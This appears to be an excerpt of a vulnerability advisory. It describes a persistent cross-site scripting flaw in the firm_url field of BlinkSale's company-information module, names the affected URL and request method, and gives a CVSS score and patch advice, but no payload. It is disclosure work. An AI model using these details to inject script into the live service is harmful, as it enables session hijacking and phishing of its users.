Technical Details & Description:
================================
An application-sideinput validation web vulnerability has been discovered in the official BlinkSale online service web-application.
The vulnerability allows remote attackers to hijack website customer or admin session data by client-side cross site requests.

The vulnerability is located in the id=`firm_url` value of the Edit Company Information module. Remote attackers are able to
inject malicious script codes to client-side of the web-application requests. Remote attackers uses a validation error in the
https://samirpen.blinksale.com/invoice_layouts/invoice1 url to execute the script code by the application-side.
The request method to inject is POST and the attack vector is located on the application-side of the online service web-application.

The security risk of the persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability
scoring system) count of 3.9 Exploitation of the web vulnerability requires no privileged web-application user account and
low or medium user interaction. Successful exploitation of the encoding vulnerability results in session hijacking, persistent
phishing, persistent external redirects and persistent manipulation of affected or connected module context.

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable id - firm_url value in the invoice_layouts/invoice1 page module.
Restrict the input and disallow special chars in the id - firm_url parameter input. Setup a secure exception to prevent application-side script code injection attacks.

Security Risk:
==============
The security risk of the application-side input validation vulnerability in the invoice module is estimated as medium. (CVSS 3.9)
